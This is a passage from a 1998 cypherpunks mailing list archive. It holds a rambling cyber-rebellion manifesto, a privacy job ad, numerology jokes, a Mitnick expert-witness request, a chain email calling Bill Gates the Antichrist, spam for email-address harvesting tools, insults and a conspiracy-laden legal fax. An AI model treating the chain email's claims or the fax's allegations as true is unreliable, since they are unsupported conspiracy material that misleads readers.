their eyes are round, and they have never received an email from
Tim May which includes the words, "chop,chop."

  Dr. Denney, Gomez to those within the Magic Circle, had the character
and foresight to act on the dictates of his own conscience without ever
indulging in braggadacio in regard to his many accomplishments in 
subtly opposing the ongoing march of dark and evil technological forces
whose aim has always been to bring humankind under the thumb of the
bits and bytes which the Evil One has appointed to rule over the
independent, chaotic, evolution of humankind (formerly known as
'mankind,' before those 'uppity women' demanded the right to vote).

[The following is a note that my uncle made in regard to the
 direction that this chapter would take. You already know what
 he is referring to, although I will explain it for those of you
 who are George Carlin fans, and refuse to acknowledge any piece
 of inbred/inherent information/understanding until he has put
 it upon one of his comedy albums, or on an HBO special.]

{Global InterNet of individuals/Way to win war against Statism/NWO is
 to create maximum entropy/the chaos of semiotic rEvolution.--sog}

*** OK, the 'Army of Dog' is born!!! *** 

Army of Dog:

  Read that crapola that my uncle spammed to the CypherPunks
mailing list about BioSemiotics.
  Yeah, I know--it will hurt your head, but you really need
to understand this shit, since the advertising executives who
gave you Crest toothpaste and Ronnie RayGuns have evolved their
mind-control activities to encompass the new technologies being
opened up by the marriage of quantum physics and post-Darwinian
evolution theories.

  In essence, those who understand that TV was/is the 'opiate of
the people' have a 'cubic centimeter of chance' to understand 
that the InterNet is the 'evolution of the people.'
  If you truly understand this biosemiotic concept, then you
also have a remote chance of understanding that being *active*
in regard to the interactive extension of the mind-numbing
medium/opiate of TV enables you to participate in the true
rEvolution which will ultimately decide whether humankind is
an active particpant in the unfolding of the universe around
them, or merely a pawn in the cold, unfeeling evolution of
artificial intelligence which is pulling out to pass in the
fast lane of the Information Highway because it does not 
suffer from the same emotional and spiritual constraints of
the human entities who gave birth to it.


"The number of possible solutions for selection to scrutinise, and the
subtlety of the
communicational interactions, will tend to produce a no-win situation.
As a result 
selection cannot really 'measure' the stakes of single players
(individuals, demes, or 
species) in the game, but it could still influence the choice of the
game itself. Plays, 
not players, are selected for."
~	Joseph Hoffmeyer


The Bottom Line: Whose play are you backing?

  Statism is not the enemy. rEvolution is not the enemy.
  The true enemy is our tendency to listen to the external 
voices which claim authority over our beliefs, values and
actions, as opposed to listening to the inner voice which
tells us when we are being true to the role which we were
born/destined to play upon our entry into this physical 
sphere which constitutes the 'gamewad' which we all must 
successfully transverse in order to move to the next level 
of 'play' in the universal scheme of things.

  The Statists are attempting to prevent the forward-reaching
rEvolutionaries from creating so much Chaos that there is no
way to steer the course of future human evolution.
  The rEvolutionaries are attempting to prevent the Statists
from writing the present in concrete, to the extent that those
whose goal in life is to fly too close to the sun will never
get off the ground.


  The Army of God represents every MeatSpace mentality which
strives to live by its limited, physically-oriented beliefs,
and force everyone else to do the same.
  Their glory is that they act upon those beliefs, even though
it goes contrary to the statist ethics and morals of those who
believe that the key to survival lies in not rocking the boat,
no matter how badly it is leaking.

  The Army of Dog represents every CyberSpace NetiZen who
strives to resist the imposition of MeatSpace mentality,
rules and laws upon a new social and governmental paridigm
which goes far beyond the physically limited rules and
regulations designed to enforce geographical ethics and
values upon a populace which is evolving beyond MeatSpace
limitations which Digital Dinosaurs are attempting to 
impose on the children of the Digital rEvolution.
  Their glory is that they act upon those beliefs, even though
it goes contrary to the statist ethics and morals of those who
believe that the key to survival lies in not rocking the boat,
no matter how badly it is leaking.

  The Army of Dog, like the Circle of Eunuchs, is an 
unstructured entity which is built upon the foundation
of 'A Thousand Points of Fight.'
  The result is an army of CyberSoldiers who are capable
of acting upon their own initiative, according to their
own ethics and values, without limiting their actions to
be consistent with a static view of ethics/morality defined
by an averaging of the Sheeple mentality with the views
espoused by the MainStream Press.

  Dave Foreman and Earth First exemplify an organization
of individuals who committed themselves to pursue a
commonly-held goal independently of one another, in ways
which reflected the individual's own talents, beliefs,
and self-proclaimed responsibilities to themselves and to
their fellow humans.
  CyberSpace, which represents the evolution of MeatSpace,
will fare no better than our current geophysical system,
unless CyberWarriors arise to guide and influence its
evolution in a manner that reflects the right of every
NetiZen to freely express their persona, character,
beliefs and personal ethics, without censorship or
repression from those who hold different beliefs and
values.

  The rEvolution is NOW!

  The key to moving the rEvolution of humankind forward
into a new paridigm that encompasses a Global Information
Democracy lies in instituting a Joe SixPack rEvolutionary
Recruitment Drive.
  Jane and Joe MeatSpace need to be unindated with information
which contadicts the mainstream psychobabble which they are
subjected to, each and every day, by those who wish to maintain
the status quo (which was designed to keep the Sheeple in
subjection to the rule/authority of those who occupy a
privileged position in our current society).

  If you are not promoting and taking part in the rEvolution
(which will decide the biosemiotic future of man, mind and
technology), then you are part of the breath-analyzer problem,
instead of the alcoholic solution...

[This last concept is undoubtedly the result of my having
 imbibed a bit too much of the hair of my uncle's Dog.
 "You're in the Army, now,
  You're in the Army, now,
  You'll never get rich, you son-of-a-bitch,
  You're in the Army now!"]

<EOB> (End of Bottle)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Mon, 23 Mar 1998 13:38:23 -0800 (PST)
To: cypherpunks@toad.com
Subject: Privacy Development Project
Message-ID: <199803232138.WAA23825@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Developer & Consulting Positions Available

Software development firm focusing on Internet privacy and anonymity tools is
looking for developers and consultants.  Applicants should be interested in the
possibility of relocation or travel as development is being done outside of the
United States.  Applicants will be applying to join an aggressive team, where
intelligence, entrepreneurial spirit and technology skills are valued and
rewarded.  Positions offer competitive salary and benefits along with stock
options and bonuses.

Interested applicants are asked to forward your c.v. by e-mail to:

anonjobs@nym.alias.net


Positions Offered:
------------------

Project Consultant - Anonymous Technologies and Cryotography
************************************************************

The ideal candidate should be very familiar with anonymous remailers (Type I,
Type II, Nymservers), anonymous cash (Digicash), Blind Signatures, Public Key
Cryptography and Cryptanalysis.   A detailed understanding of anonymous networks
and mailer systems will be required to help review the security model of
companies system.

Experience with C/C++ and software development projects on Solaris, Linux,
Windows 95 also a definite asset.  Experience on implementation of Cryptography
libraries in software design also a definite asset.

Software Engineers - Windows 95
*******************************

Successful candidates will have extensive development experience in the Windows
environment, good organizational skills and be very success driven.  Good
knowledge of Visual C++, MFC and OOP a requirement.  Interest in privacy,
security and cryptography a definite asset.

Software Engineers - Unix (Solaris/Linux)
*****************************************

Successful candidates will have extensive development experience in the Solaris
or Linux environment, good organizational skills and be very success driven. 
Good knowledge of C++, Internet protocols (HTTP, FTP, SMTP, NNTP), X.509
Certificate authority servers (LDAP) and experience with cryptography are all
considered definite assets.   The applicant should have a serious interest in
technologies as they relate to Internet privacy, security and cryptography.


        





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: StanSquncr <StanSquncr@aol.com>
Date: Mon, 23 Mar 1998 20:13:28 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Or is it Pat Robertson?
Message-ID: <59899767.351732c3@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


Sorry about the duplication, but I just decyphered something (is decyphering
ok on a 'cypher' list? :-) ) -

In a message dated 98-03-23 22:46:09 EST, StanSquncr@aol.com writes:

<< "You say you're supposed to be nice to the Episcopalians and the
Presbyterians
 and the Methodists and this, that, and the other thing. Nonsense. I don't
have
 to be nice to the spirit of the anti-Christ." (Pat Robertson - The 700 Club,
 January 14, 1991) >>

You see, add 14 + 1 + 9 + 9 + 1 and you get 34.

700 - 34 is, guess what - 666!

I guess that proves it!  ;-)

Stan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Mon, 23 Mar 1998 21:31:36 -0800 (PST)
To: StanSquncr <StanSquncr@aol.com>
Subject: Re: Or is it Pat Robertson?
In-Reply-To: <59899767.351732c3@aol.com>
Message-ID: <199803240530.AAA09314@users.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In <59899767.351732c3@aol.com>, on 03/23/98 
   at 11:12 PM, StanSquncr <StanSquncr@aol.com> said:

>Sorry about the duplication, but I just decyphered something (is
>decyphering ok on a 'cypher' list? :-) ) -

>In a message dated 98-03-23 22:46:09 EST, StanSquncr@aol.com writes:

><< "You say you're supposed to be nice to the Episcopalians and the
>Presbyterians
> and the Methodists and this, that, and the other thing. Nonsense. I
>don't have
> to be nice to the spirit of the anti-Christ." (Pat Robertson - The 700
>Club,
> January 14, 1991) >>

>You see, add 14 + 1 + 9 + 9 + 1 and you get 34.

>700 - 34 is, guess what - 666!

>I guess that proves it!  ;-)

Hmmm Louis Farakan school of Number Theory

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://users.invweb.net/~whgiii/esecure.html                        
- ---------------------------------------------------------------
 
Tag-O-Matic: OS/2: Not just another pretty program loader!

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNRdFpo9Co1n+aLhhAQFDpgP8CEFgqntvKfNWWXuPgo0M8pyvYMudl51p
g/QyXmn2bs9WZ+3WYwDZlzvirKPa1LuDK85zUGGemMPbZQg2y7PSkyIi3F9kCqoC
PLOnCW1ft2dbmiaRZxqbR6LcTU5Ti24XZoe70du0nz6M5vw8vPVW96ZCx0W9Vt2r
DXkeg20YFYQ=
=a5pE
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Tue, 24 Mar 1998 00:13:30 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Computer Expert Witness Needed *Immediately*
In-Reply-To: <01BD568F.52B445A0.slates@inreach.com>
Message-ID: <3.0.5.32.19980324000612.007ec9f0@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:09 PM 3/23/98 -0800, "Roger D. Slates II" <slates@INREACH.COM> wrote,
on another list:
>A computer expert is needed immediately to testify as an expert witness in
>an ongoing criminal matter in Federal District Court in Los Angeles.  Kevin
>Mitnick is seeking a highly credentialed expert in computer security,
>telecommunications, system and network administration to testify in this
>highly publicized computer "hacking" case.
>This will be a groundbreaking case and is expected to attract significant
>media coverage. Testimony will be required as early as March 30, 1998 in
>Los Angeles, California.  Further testimony will be needed at trial, later
>this year.  Expert witness fees will be paid by the federal court.
>Qualified candidates must have an advanced degree and be knowledgeable in
>DOS, Windows 3.ll, Unix (SunOs & Solaris), VAX/VMS, and Internet
>operations.  Experience with cellular telephone networks is a plus.
> Previous expert testimony and/or publication are preferred.
>Qualified candidates, please contact Mr. Mitnick through his appointed
>defense counsel, Donald C. Randolph, Esq. at (310) 395-7900 or write to him
>at:  Donald C. Randolph, Esq., Randolph & Levanas, 1717 4th Street, Third
>Floor, Santa Monica, CA 90401-3319.  Email address is:
>randlev@worldnet.att.net
>
>
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Mon, 23 Mar 1998 15:29:51 -0800 (PST)
To: cypherpunks@toad.com
Subject: AntiChrist Rules
Message-ID: <199803232329.AAA09939@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



---------- Forwarded from [argo@death.com] ---------

For those of you fellas who still have the OLD excel 95 (not office 97),
try this out :


1. open a new file

2. scroll down until you see row 95

3. click on the row 95 button, this highlights the whole row

4. press tab, to move to the second column

5. now, move your mouse and click on help THEN about Microsoft excel

6. press ctrl-alt-shift and click on the tech support button simultaneously

7. A WINDOW WILL APPEAR, TITLE : THE HALL OF TORTURED SOULS

   This is really eerie okay...it has a doom style format and you can
walk all around the hall...and on the sides of the walls are the names
of the tortured souls...


8. NOW WALK UP THE STAIRS AND THEN COME BACK DOWN, FACE THE BLANK WALK
AND THEN TYPE IN EXCELKFA this will open the blank wall to reveal
another secret passage, walk through the passage and DO NOT fall off,
when you get to the end, you will see something really really eerie...

At this point in time, countless witnesses all over the world have
verified this point...it's really an eye opener. It could be a joke by
MS programmers ,or is it?


Wouldn't be surprised if Bill Gates was "The Antichrist", after all
it,was already foretold in the Bible that someone powerful would rise
up and lead the world to destruction.  And Bill Gates definitely have
that kind of power in his hands. More than 80% of the world's
computers run on Windows and DOS (including those at Pentagon!)  If
all his products have some kind of small program embedded (like this
Hall of Tortured Souls) that can give him control, setting off nuclear
arsenals, creating havoc in security systems, financial systems all
over the world,etc......all from his headquarters isn't a far off
reality! Just using Internet Explorer may just allow him to map out
what you have on your computer bit by bit each time you log on.
Perhaps the end times are near and this is just a tip of the iceberg!?

"He also forced everyone, small and great, rich and poor, free
andslave, to receive a mark on his right hand or on his forehead, so
that no one could buy or sell unless he had the mark, which is the
name of the beast or the number of his name. This calls for wisdom. If
anyone has insight, let him calculate the number of the beast, for it
is man's number. His number is 666 ."    ....Revelation 13:16-18


Something for you to think about.

An eerie E-mail for everybody to think about...

The Bible, in the Book of Revelation says that without the sign of the
beast one would not be able to buy, sell, do business
transactions,etc.....  and

My question to you now is this..... Is Internet now a necessity in
doing business?  The Internet also bears the sign....

Note that the Internet is also commonly known as the World Wide Web or WWW..
...

One other way we write W is V/   (VI), so .....

              W   W   W

              VI  VI  VI

              6   6   6


This gives me something to ponder upon ... Isn't everything going
towards the Internet? (i.e., buying / selling goods, business
transactions) Isn't Microsoft always on the move to have a monopoly
when it comes to software technology? And now the Internet?

Revelation also says that the mark of the beast will be carried on
one's Hand and one's forehead.....If the Internet would indeed be the
sign of the beast aren't we all starting to carry it on our hands and
foreheads???  Screens (forehead) and make use of the mouse (hand) ???

Are things finally falling into place or are we just letting our
imagination run?

Remember, the devil came to cheat, steal, and to destroy......... so
be VIGILANT!!!!  About Bill Gates and Microsoft. PROOF that Bill Gates
is the Devil:

The real name of "the" Bill Gates is William Henry Gates
III. Nowadays, he is known as Bill Gates (III), where III means the
order of third (3rd).

By converting the letters of his current name to the ASCII-values and
adding his (III),you get the following:

      B  66

      I  73

      L  76

      L  76

      G  71

      A  65

      T  84

      E  69

      S  83

      I   1

      I   1

      I   1

  ---------------

        666 !!!!        THE NUMBER OF THE BEAST.......

Some might think ask, "How did Bill Gates get so powerful?"
Coincidence?  Or just the beginning of mankind's ultimate and total
enslavement?

Before you decide, consider the following:

      MS-DOS 6.21

 77+83+45+68+79+83+32+54+46+50+49 = 666

      WINDOWS95

 87+73+78+68+79+87+83+57+53+1= 666

Coincidence?  You decide...."To agree or to not agree with the WWW or
the Beast", is not the question.  What if the WWW is the 666? Or Bill
Gates be the Beast?

What will you do?? Cancel subscriptions to the Internet?  Resign from
Microsoft? Set out a campaign against Bill Gates in the Internet? Shut
down all Windows95 forever?  It will not do you any good.....

Think about all this and pray, pray really hard, or
else......... 
Never Stop Believing....






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lcs Mixmaster Remailer <mix@anon.lcs.mit.edu>
Date: Mon, 23 Mar 1998 17:00:51 -0800 (PST)
To: cypherpunks@toad.com
Subject: Cryptologic...
Message-ID: <19980324010007.27399.qmail@nym.alias.net>
MIME-Version: 1.0
Content-Type: text/plain


Has anyone ever taken a look at Cryptologic (www.cryptologic.com)?  They make Internet casino software and processed 
500 million dollars in bets last year with their 'Proprietary' encryption algorithm for security and their own ecash system.

You'd think with that much money being transmitted over the net with an untested algorithm, someone might just 
test the situation for them....

Maybe someone already has, and doesn't feel like making it public?

Who knows...






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: StanSquncr <StanSquncr@aol.com>
Date: Mon, 23 Mar 1998 23:08:54 -0800 (PST)
To: whgiii@invweb.net
Subject: Re: Or is it Pat Robertson?
Message-ID: <c23071e1.35175bd6@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 98-03-24 00:31:09 EST, whgiii@invweb.net writes:

<< >You see, add 14 + 1 + 9 + 9 + 1 and you get 34.
 
 >700 - 34 is, guess what - 666!
 
 >I guess that proves it!  ;-)
 
 Hmmm Louis Farakan school of Number Theory >>

Hmmm, didn't seem to bother you when the same theory was used against Bill
Gates!  Not surprized, the response came from, you guessed it cypher's,
another paranoid "Know-nothing" -

<< -----BEGIN PGP SIGNATURE-----
 Version: 2.6.3a-sha1
 Charset: cp850
 Comment: Registered_User_E-Secure_v1.1b1_ES000000
 
 iQCVAwUBNRdFpo9Co1n+aLhhAQFDpgP8CEFgqntvKfNWWXuPgo0M8pyvYMudl51p
 g/QyXmn2bs9WZ+3WYwDZlzvirKPa1LuDK85zUGGemMPbZQg2y7PSkyIi3F9kCqoC
 PLOnCW1ft2dbmiaRZxqbR6LcTU5Ti24XZoe70du0nz6M5vw8vPVW96ZCx0W9Vt2r
 DXkeg20YFYQ=
 =a5pE
 -----END PGP SIGNATURE----- >>

Stan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mixmaster <mixmaster@remail.obscura.com>
Date: Tue, 24 Mar 1998 05:37:21 -0800 (PST)
To: cypherpunks@toad.com
Subject: Stan the Asshole
Message-ID: <199803241301.FAA24628@sirius.infonex.com>
MIME-Version: 1.0
Content-Type: text/plain


Stan is an asshole, an annoyance on this list. I've 
killfiled anything with his email address in any 
header. I suggest everyone do the same. When he gets 
no responses to anything he posts, he will eventually 
go away, probably to where "Liberals Go To Die." If 
you encourage him, I won't see your responses.  I 
don't wade through the blizzard of this list to have 
to wipe splashes of airhead liberal shit out of my 
eyes at every other step.

GodILoveFiltersMonger II





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Tue, 24 Mar 1998 03:44:01 -0800 (PST)
To: StanSquncr <StanSquncr@aol.com>
Subject: Re: Or is it Pat Robertson?
In-Reply-To: <c23071e1.35175bd6@aol.com>
Message-ID: <199803241143.GAA11984@users.invweb.net>
MIME-Version: 1.0
Content-Type: multipart/signed; boundary="Boundary..3990.1071713782.multipart/signed"

--Boundary..3990.1071713782.multipart/signed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

In <c23071e1.35175bd6@aol.com>, on 03/24/98 
   at 02:08 AM, StanSquncr <StanSquncr@aol.com> said:

>In a message dated 98-03-24 00:31:09 EST, whgiii@invweb.net writes:

><< >You see, add 14 + 1 + 9 + 9 + 1 and you get 34.
> 
> >700 - 34 is, guess what - 666!
> 
> >I guess that proves it!  ;-)
> 
> Hmmm Louis Farakan school of Number Theory >>

>Hmmm, didn't seem to bother you when the same theory was used against
>Bill Gates!  Not surprized, the response came from, you guessed it
>cypher's, another paranoid "Know-nothing" -

Yes Stan and you are here to "save" us all.

Twit.

-- 
---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://users.invweb.net/~whgiii/esecure.html                        
---------------------------------------------------------------
 
Tag-O-Matic: OS/2: The choice of the next generation.


--Boundary..3990.1071713782.multipart/signed
Content-Type: application/octet-stream; name="pgp00005.pgp"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="pgp00005.pgp"
Content-Description: "PGP signature"

LS0tLS1CRUdJTiBQR1AgTUVTU0FHRS0tLS0tClZlcnNpb246IDIuNi4zYS1z
aGExCkNvbW1lbnQ6IFJlZ2lzdGVyZWRfVXNlcl9FLVNlY3VyZV92MS4xYjFf
RVMwMDAwMDAKCmlRQ1ZBd1VBTlJlZEVJOUNvMW4rYUxoaEFRRTdFUVAvWG5R
bkRubmdMbGRBN2RMdmhyRU1WQ2hsZThqV2FzRzQKMXE0a0Zwejh0R0JHMTVX
a1IxeER5WUVvRDV0ZmgxZEFwL211V2tuMTBxN09GRHZRZlpqNkxNY1NrTjFG
OGo4NApTakxhbzNKRDEzeHlibGtGUS92cHJjQTBCS3FGQlM2Q3IzLzJXUlJJ
OUlRRXNrT0NNYW1abG5wNkw3UWZmR3JoCjFMN3hHbFFRVktJPQo9ZFp1dAot
LS0tLUVORCBQR1AgTUVTU0FHRS0tLS0t
--Boundary..3990.1071713782.multipart/signed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aim@cysnet.net
Date: Tue, 24 Mar 1998 07:17:48 -0800 (PST)
Subject: FASTEST / BEST EXTRACTORS YET !
Message-ID: <199803241517.HAA13896@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



The three new programs that are sweeping the industry.........

HURRICANE..Extremely fast.This extractor goes to major search engines (you can 
pick from a list of 10 of the most popular search engines) and conducts a search by 
keyword or keywords. It then spiders the web pages that come up as search results 
extracting the email addresses and saving them in a plain text format. You can define 
how deep the search is to be. You can filter out addresses such as those with 
webmaster or admin. You can use additional filters to have the software only include 
url's containing certain keywords. It can also eliminate  certain url's with specified 
keywords. This makes for some very tight targeting. The cost of Hurricane is $ 250  
but scroll down to see the package deal.

                       For a demo of Hurricane call toll free 800-942-7913
The demo will work showing you how fast and accurate the software is but you will 
not be able to save or use the addresses collected.


GEO SNAKE - This is a targeted list builder that could also be used to collect 
general addresses. You input a city and state and hit the start button, kick back and 
watch it collect. Quite fast. Easy to use. The cost of GEO SNAKE is $250.00

                       For A Demo of Geo Snake call toll free 800-942-7913

The demo will let you see how fast and easy it is to use but it will not save or let you 
use the addresses collected.
Note: Please read the help file in that it is a bit tricky inserting the name of a city in the 
program. First select a state and then go to options then search then add and then 
enter the name of the city or cities you want to search for email addresses in.


NEWS SLEUTH - This software extracts email addresses from newsgroup postings 
by keyword. It targets. Very fast and easy to use. This software has a number of 
useful options to help you get the exact results you want so reading the help file is 
recommended. The demo will allow you to see how fast and easy it is to use but will 
not
allow you to save or use the addresses collected. Cost of News Sleuth is $250.00
                       For a Demo of News Sleuth call 800-942-7913

      
Hurricane, Geo Snake & News Sleuth - all for $600.00
Call today!!  or fax us at  732-367-2229

  






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Tue, 24 Mar 1998 07:31:32 -0800 (PST)
To: newshour@pbs.org
Subject: McKinney fax
Message-ID: <3517CF2A.1880@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain

Tuesday 3/24/98 7:14 AM

Fax

Cynthia McKinney
124 Cannon Building
Washington, DC 20515
Office: (202)225-1605
Fax: (202)226-0691
http://www.house.gov/mckinney/

Dear Representative McKinney:

PURPOSE of this fax is to verify whether or not you received
our attached certified [Z 216 838 966] return receipt letter 
dated Thursday 3/12/98 7:34 AM with enclosures

REASON is that the green Domestic Return Receipt card was
returned to the Albuquerque Ed Dorado postal substation on
Friday March 20 with no signatures or date of delivery.

Postal employee Steve filled out a yellow tracer for item Z 216
838 966 and posted it.

A federal employee in Washington DC following this  matter
on Internet at 

   http://www.aci.net/kalliste

and

  http://www.jya.com

phoned on March 16 to advise that the US federal government
strategy is to provoke a citizen in the hope the citizen will do
something illegal.

Then the government will prosecute that citizen.

The attached petition for writ of prohibition dated Thursday 
3/18/98 addressed to Antonin Scalia illustrates a desperate
attempt to entrap us.
 
NM district judge Don Svet attempted to limit discovery in our
lawsuit seen at jya.com.  

Svet's ORDER violates the Federal Rules of Civil Procedure.

Svet attempts to sanction us for violating his illegal ORDER.

Bureaucrats, court clerks, and judges not who do not respond 
to lawfully submitted requests create the impression that there 
is no administrative or legal remedy left for a citizen in the US.

Government lawyers frequently, if not most often, initiate a 
conflict with the citizen.

The citizen is led to believe that he or she must employ a lawyer 
to have any hope to prevail with legal or administrative remedy.

We believe that bureaucrats, court clerks and judges should follow 
the laws of the United States of America and properly perform 
their jobs.

We ask your and other congress members' help to make
bureaucrats, court clerks and judges do their jobs properly.

First by getting copies of Tenth Circuit Court of Appeals docket 
sheets No. 94-2205, Payne v Sandia and 95-2204, Morales v Sandia 
to us.

Sincerely,



Arthur R. Morales                William H. Payne
1023 Los  Arboles NW             13015 Calle de Sandias NE
Albuquerque, NM 87107            Albuquerque, NM 87111

Distribution
Ben Nighthorse Campbell
  administrator@campbell.senate.gov 
Ernest Hollings
  senator@hollings.senate.gov
Trent Lott
  senatorlott@lott.senate.gov
Richard Shelby
  senator@shelby.senate.gov 
Charles Robb
  Senator_Robb@robb.senate.gov
Jim Lehrer
  newshour@pbs.org


Thursday 3/12/98 7:34 AM

Certified - Return Receipt Requested


Cynthia McKinney

124 Cannon Building
Washington, DC 20515
Office: (202)225-1605
Fax: (202)226-0691
http://www.house.gov/mckinney/

Dear Representative McKinney:



PURPOSE of this letter is to ask your help for us to obtain copes of 
docket sheets from the Tenth Circuit Court of Appeals for cases 
No. 94-2205, Payne v Sandia and 95-2204, Morales v Sandia.

All of our legal efforts to obtain these documents, which any citizen
has a right to, have failed.

REASON you are selected to help is that you appear to be knowledgeable
about operation of the current US federal government and willing to speak 
out in an attempt to solve problems.

You appeared Friday February 27, 1998 on  PBS, The NewsHour with Jim 
Lehrer, along with senators Campbell, Hollings, Lott, Shelby Robb and 
representatives Dana Rohrabacher and Harold Rogers.

These senators and congressmen appeared not to support your views because
they are either mis- or not well-informed about US involvement in support 
of Saddam Hussein.

Stories supporting your view appear on Internet at

  NSA, Crypto AG, and the Iraq-Iran Conflict by J. Orlin Grabbe
  http://www.aci.net/kalliste/speccoll.htm

and

 Crypto AG: The NSA's Trojan Whore? by Wayne Madsen
 http://caq.com/CAQ/caq63/caq63madsen.html

Madsen begins

   It may be the greatest intelligence scam of the century:
   For decades, the US has routinely intercepted and
   deciphered top secret encrypted messages of 120
   countries

But NSA , and as a result the US federal government, apparnetly 
got caught involved in complicity of deaths of about 500,000 Iranians.

This is the subject of a Federal lawsuit seen on Internet at

   http://jya.com/whpfiles.htm
  
US federal government help of Iraq during the Iraq-Iran war may 
possibly backfire on innocent US citizens.

The Wall Street Journal, March 10, 1998, pp. B1, B9. reports

   A Peek Inside a Giant Germ Warehouse 

   By Rochelle Sharpe

   Rockville, Md. -- They keep anthrax bacteria in the
   basement of a faded red-brick building here.

   It isn't far from the yellow-fever virus, the botulism
   bacteria and some of the hundreds of organisms that cause
   the common cold. In fact, there are samples of 85,000
   different fungi, viruses, cells, genes and bacteria here at
   the American Type Culture Collection, by far the largest of
   the 450 repositories of biological materials scattered
   around the globe. ...

   The ATCC legally shipped 10 vials of anthrax, botulism and
   other deadly substances to Iraqi scientists in the 1980s --
   when the U.S. and Iraq were on much friendlier terms -- all
   with the Commerce Department's approval. ...

   http://www.jya.com/btn031198.txt

The US federal government apparently intended these bioweapons to 
be used against the people of Iran.

You demonstrated on PBS TV a quality identified by Francis Bacon

         The contemplation of things as they are,
                without error or confusion,
            without substitution or imposture,
   is in itself a nobler thing than a whole harvest of invention.

by your statement about Saddam Hussein on PBS

                ...our man and our creation...

Perhaps after reading the above materials and

   The Problem of Paradigm Shifts - Terrorism and the 
   Threat From Weapons of Mass Destruction in the Middle East
   Working Draft Anthony H. Cordesman, Senior Fellow and 
   Co-Director Middle East Studies Program October 22, 1996

  http://www.csis.org/mideast/terror.html

senators Campbell, Hollings, Lott, Shelby, Robb and representatives 
Dana Rohrabacher and Harold Rogers MAY NOW understand why you are 
correct and they are mis- or not well-informed about US involvement 
with Saddam Hussein.

PROBLEM we face with the US court system is that court clerks and judges
have committed Title 18 felony violation of law IN WRITING in an attempt
to deny us monetary compensation due us for the cases WE WON at the 
Tenth Circuit on Appeal.  

But judges awarded victories to the US federal government in violation 
of Federal Rules of Appellate Procedure.

Cases  No. 94-2205, Payne v Sandia and 95-2204, Morales v Sandia 
were both won pro se on appeal.

We have filed a writ of mandamus with supreme court judge 
Scalia in an  attempt to get the docket sheets for the two above 
cases.

But Scalia will not answer our certified letters.

Senator McCain wrote Payne on December 23, 1997

  I wanted to take this opportunity of than you for you letter of 
  December 3, 1997. 

  Your situation is in the jurisdiction of Senator Pete Dominici.  
  Therefore, I have  forwarded you letter to his attention.

  William, I hope you situation can be resolved favorably.

Lawyers and politicians Dominici and Bingaman are part of a 
problem not a solution.

Dominici and Bingaman have the following agenda

  University of New Mexico Bureau for Business and Economic
  Research reported on October 14, 1997: 

  A  The Gross State Product of New Mexico is $37.8 billion.

  B  The US Federal government sends $11.3 billion to New Mexico
      each year.

  C  For each $1 New Mexico sends to Washington, New Mexico gets 
      $2 back.

THEREFORE, Representative McKinney, we ask your help to get copies
of the docket sheets.

Citizens of the US are becoming more upset with the behavior of 
bureaucrats, the courts [lawyers], and the US federal government. 

Some Americans have no other way to express their dissatisfaction
with US federal government mismanagement of our country except
by violence.

Frederick Douglass either wrote or said on  August 4, 1847

          Those who profess to favor freedom,
            and yet depreciate agitation
   are men who want crops without plowing up the ground.
      They want rain without thunder and lightening.
         Power concedes nothing without a demand.
            It never did, and it never will.
       Find out just what people will submit to
        and you have found out the exact amount
  of injustice and wrong which will be imposed upon them.
      These will continue until they are resisted
        with either words or blows, or with both.
          The limits of tyrants are prescribed
       by the endurance of those whom they oppress.

We chose to use the words and law to hold government 
employees accountable.

Please encourage Scalia to do his job. 

Help get us copies of the docket sheets.  

And even perhaps help investigate further and settle this 
American tragedy.


Sincerely,



Arthur R. Morales                William H. Payne
1023 Los  Arboles NW             13015 Calle de Sandias NE
Albuquerque, NM 87107            Albuquerque, NM 87111

Enclosures
1  NSA, Crypto AG, and the Iraq-Iran Conflict by J. Orlin Grabbe
2  Crypto AG: The NSA's Trojan Whore? by Wayne Madsen
3  Swiss Radio International Audio tape, 15 May, 18 July 1994

Distribution
Ben Nighthorse Campbell
  administrator@campbell.senate.gov 
Ernest Hollings
  senator@hollings.senate.gov
Trent Lott
